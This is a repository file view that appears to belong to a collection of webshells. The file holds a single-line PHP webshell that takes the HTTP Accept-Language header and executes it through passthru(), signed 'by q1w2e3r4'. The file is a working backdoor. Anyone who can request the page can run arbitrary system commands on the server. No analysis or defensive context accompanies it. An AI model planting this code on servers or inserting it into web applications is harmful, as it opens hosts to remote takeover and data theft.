webshells/php/accept_language.php

2 lines
76 B
PHP
Raw Normal View History

2015-01-12 22:32:48 +00:00
<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>